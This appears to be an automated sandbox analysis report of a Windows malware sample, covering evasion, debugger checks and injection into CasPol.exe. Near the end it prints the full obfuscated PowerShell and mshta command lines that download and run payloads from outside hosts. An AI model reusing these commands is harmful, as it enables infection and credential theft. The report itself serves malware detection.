                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040E627 Sleep,ExitProcess,12_2_0040E627
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_00419AB8
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6971Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2656Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4081Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5735Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9226Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: foregroundWindowGot 1770Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_12-52758
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI coverage: 9.4 %
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440Thread sleep count: 6971 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep count: 2656 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7488Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8076Thread sleep count: 252 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8076Thread sleep time: -126000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8080Thread sleep count: 219 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8080Thread sleep time: -657000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8080Thread sleep count: 9226 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8080Thread sleep time: -27678000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B63A FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B63A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418E5F FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418E5F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: powershell.exe, 00000003.00000002.1774693140.0000000004849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                        Source: wscript.exe, 00000006.00000002.1750442495.0000000003640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b})
                        Source: powershell.exe, 00000003.00000002.1774693140.0000000004849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                        Source: powershell.exe, 00000003.00000002.1779425802.0000000007CF1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1779425802.0000000007C7D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4102227044.0000000001318000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4102227044.0000000001391000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: powershell.exe, 00000007.00000002.1986804543.000000000AF91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 4'^qemU
                        Source: powershell.exe, 00000003.00000002.1774693140.0000000004849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                        Source: powershell.exe, 00000007.00000002.1944544360.0000000007569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_12-54429
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043A86D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A86D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BEEE LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BEEE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00442764 mov eax, dword ptr fs:[00000030h]12_2_00442764
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10004AB4 mov eax, dword ptr fs:[00000030h]12_2_10004AB4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00410BF1 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,12_2_00410BF1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434378 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00434378
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043A86D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A86D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433D4F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00433D4F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433EE2 SetUnhandledExceptionFilter,12_2_00433EE2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_100060E2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_10002639
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_10002B1C

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: Yara matchFile source: amsi32_7652.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7600, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7652, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041742B GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,12_2_0041742B
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 458000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 471000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 477000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47C000Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: E4D008Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_0041100E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041894A mouse_event,12_2_0041894A
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.cmdline"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8DF2.tmp" "c:\Users\user\AppData\Local\Temp\2qf3pwzp\CSCB3A240E1501D48929A893BA197F62C4E.TMP"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\aockdegvxmbvbenvzdaftknehua"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\kihdewrolutadkbziovgwxanibscod"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nkmnepbqzclnnyxdazhahcueqhcdhonmrf"Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jgjvwg5vdsagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkrc1uwvbficagicagicagicagicagicagicagicagicagicagicagic1nzu1izxjeruzjbml0sw9oicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnt04uzexsiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbilhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicblb29qlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbfcvosdwludcagicagicagicagicagicagicagicagicagicagicagicb0awdtleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbjbmduwwpaefvnktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjmvmyiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lc1bby0ugicagicagicagicagicagicagicagicagicagicagicagrwdoysagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrib1huvxu6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy43lzc3l3nlzxrozwjlc3r0agluz3nmb3jnzxrtzwjhy2t3axroz29vzg5ld3n0agluz3mudelgiiwijevovjpbufbeqvrbxhnlzxrozwjlc3r0agluz3nmb3jnzxrtzwjhy2t3axroz29vzg5ld3n0agkudmjtiiwwldapo1n0yvjulxnszuvqkdmpo2luvm9rrs1fwhbyrvntau9oicagicagicagicagicagicagicagicagicagicagicagicik